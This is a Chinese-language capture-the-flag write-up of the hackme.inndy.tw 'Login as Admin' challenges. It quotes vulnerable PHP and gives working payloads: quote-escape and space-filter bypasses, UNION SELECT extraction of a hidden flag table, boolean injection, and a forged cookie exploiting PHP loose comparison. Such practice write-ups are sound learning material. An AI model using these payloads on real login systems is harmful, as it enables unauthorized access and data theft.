Hackme平台WriteUp

hackme.inndy.tw/scoreboard/ WriteUp

login as admin 0

过滤函数：

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
        strstr($strl, 'update') || strstr($strl, 'delete')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

查询语句：

$connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
        $_POST['name'],
        $_POST['password']

过滤函数中转义了单引号，而数据库使用utf8，无法使用宽子节注入。尝试把转义符转义。

SELECT * FROM user WHERE user = 'admin' AND password = ' \'or 1--+ '
name = admin
password = 'or 1--+，失败
password = 'or 2=2%23，登陆成功，提示 “
Hi, guest
You are not admin!
”
说明用户名为admin的用户 $user->is_admin 字段不为 1，需要查询is_admin字段为1的用户

'union select 1,2,3,4

Hi, 2
You are admin!
FLAG{' UNION SELECT "I Know SQL Injection" #}, flag2 in the database!

得到了flag1，同时发现union注入的回显位置是2，flag2在数据库中

union注入表名，发现隐藏表：
h1dden_f14g
字段名：the_f14g

union select 1,the_f14g,3,4 from h1dden_f14g #，得到flag2

FLAG{Good, Union select is quite easy to exploit!}

Login as Admin 1

过滤函数如下：

function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}

$_POST = array_map(safe_filter, $_POST);

用 /**/ 代替空格，使用union注入：

name=%5C%27union%2F\*\*%2Fselect%2F\*\*%2F1%2C2%2C3%2C4%2F**%2F%23&password=123  

得到flag1:

Hi, \\'union/**/select/**/1,2,3,4/**/#

            
You are admin!

            FLAG{He110, Admin\\' or 1337 < 314159 #}, flag2 in the database! 

提示flag2在数据库中，而没有回显位置，考虑使用bool注入。

login_as_admin1

0bdb54c98123f5526ccaed982d2006a9,users

id,4a391a11cfa831ca740cf8d00782f3a6,id,name,password,isadmin

FLAG{W0W,Youfoundthecorrecttableandtheflag,andUserAgent}

Login as Admin 3

查看源码反，容易看穿本题不是sql注入题，而是一道限制条件绕过题。
关键代码如下：

function load_user()
{
    global $secret, $error;

    if(empty($_COOKIE['user'])) {
        return null;
    }

    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];

    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }

    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}

用guest用户登录，查看cookie并解码：
{"sig":"75d53f97acd211098a052b305d1caf191436c6d29d1936d947f8fde7733008a3968edaa4b4a68242db8696030505273914ded688d459e8c9225200d729a0b98e","data":"["guest",false]"}

改为：
{"sig":0,"data":"["guest",false]"} 并base64编码，可绕过
得到

FLAG{H3110, 4dm1n1576a70r... 1f y0u kn0w my 53cR37 and Use STRONG COMPARE pls}

关键代码：

if($_POST['name'] === 'admin') {
    if($_POST['password'] !== $password) {
        // show failed message if you input wrong password
        header('Location: ./?failed=1');
    }
}

问题出在判断密码错误后进行了重定向，但没有exit，后续代码仍可运行。

burpsuite抓包得到FLAG：
FLAG{Remember add exit after redirection..}